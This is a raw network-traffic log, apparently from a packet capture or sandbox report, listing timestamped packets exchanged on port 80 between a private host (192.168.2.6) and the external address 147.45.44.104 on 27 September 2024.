Sep 27, 2024 00:29:12.260142088 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260148048 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260158062 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260168076 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260168076 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260179996 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260184050 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260190964 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260221004 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260266066 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260278940 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260296106 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260320902 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260334969 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260360003 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260364056 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260374069 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260387897 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260469913 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260483027 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260494947 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260508060 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260515928 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260546923 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260569096 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260615110 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260644913 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260658979 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260700941 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260718107 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.261879921 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.261912107 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.261925936 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.261925936 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.261996984 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262063980 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262078047 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262092113 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262106895 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262109041 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262149096 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262186050 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262198925 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262212038 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262228012 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262248039 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262269974 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262376070 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262412071 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262424946 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262437105 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262449980 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262468100 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262469053 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262482882 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262495041 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262506008 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262510061 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262523890 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262571096 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262612104 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262617111 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262629986 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262643099 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262655973 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262670040 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262693882 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262805939 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262823105 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262835979 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262850046 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262862921 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262867928 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262876034 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262891054 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262972116 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.262975931 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.262990952 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263003111 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263015985 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263019085 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263031960 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263051033 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263052940 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263079882 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263134003 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263156891 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263171911 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263184071 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263191938 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263217926 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263325930 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263364077 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263376951 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263401031 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263410091 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263415098 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263427973 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263437986 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263441086 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263454914 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263464928 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263468981 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263490915 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263654947 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263668060 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263679981 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263689995 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263693094 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263708115 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263714075 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263722897 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263751030 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263808966 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263822079 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263834953 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263842106 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263848066 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263859987 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263873100 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263873100 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263890982 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.263905048 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.263955116 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.264283895 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.264306068 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.264318943 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.264332056 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.264347076 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.264348984 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.264358997 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.264372110 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.264375925 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.264385939 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.264391899 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.264399052 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.264411926 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.264419079 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.264425039 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.264436960 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.264445066 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.264450073 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.264481068 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.350878000 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.350919962 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.350930929 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.350943089 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.350954056 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.350964069 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.350980043 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351011038 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351025105 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351051092 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351113081 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351125956 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351156950 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351188898 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351191044 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351202965 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351214886 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351228952 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351248026 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351262093 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351274014 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351274014 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351288080 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351300955 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351310015 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351336002 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351416111 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351429939 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351442099 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351455927 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351469040 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351485968 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351491928 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351505995 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351517916 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351531029 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351545095 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351558924 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351584911 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351613045 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351627111 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351643085 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351655960 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351656914 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351669073 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351675034 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351690054 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351700068 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351706028 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351721048 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351735115 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.351742983 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.351769924 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.352896929 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.352945089 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.352958918 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.352994919 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353029013 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353041887 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353055000 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353069067 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353076935 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353081942 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353092909 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353094101 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353128910 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353149891 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353163004 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353177071 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353190899 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353197098 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353204012 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353210926 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353243113 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353298903 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353312969 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353326082 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353339911 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353348017 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353353977 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353368044 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353388071 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353411913 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353435993 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353450060 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353476048 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353482962 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353490114 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353529930 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353534937 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353552103 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353566885 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353589058 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353601933 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353625059 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353647947 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353661060 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353673935 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353693008 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353696108 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353708029 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353719950 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353722095 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353775024 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353775978 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353789091 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353810072 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353822947 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353823900 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353837013 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353858948 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353873014 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353894949 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.353969097 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353981972 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.353996038 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354008913 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354016066 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354022980 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354038000 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354043961 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354049921 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354063034 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354068995 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354104042 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354130030 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354142904 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354155064 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354176044 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354192019 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354204893 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354218006 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354228973 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354233027 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354249001 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354260921 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354278088 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354285955 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354291916 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354331970 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354379892 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354394913 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354408979 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354423046 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354438066 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354461908 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354480028 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354494095 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354509115 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354523897 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354526997 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354554892 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354593039 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354607105 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354619026 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354634047 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354644060 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354649067 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354664087 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354670048 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354700089 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354721069 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354764938 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354779005 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354798079 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354865074 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354878902 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354892969 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.354917049 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.354939938 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.442333937 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442362070 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442377090 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442394018 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442404985 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442414999 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442426920 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442425966 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.442439079 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442454100 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442465067 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442471981 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.442500114 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.442516088 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442548037 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442569971 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442584038 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.442591906 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.442626953 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.442641020 CEST	80	57911	147.45.44.104	192.168.2.6
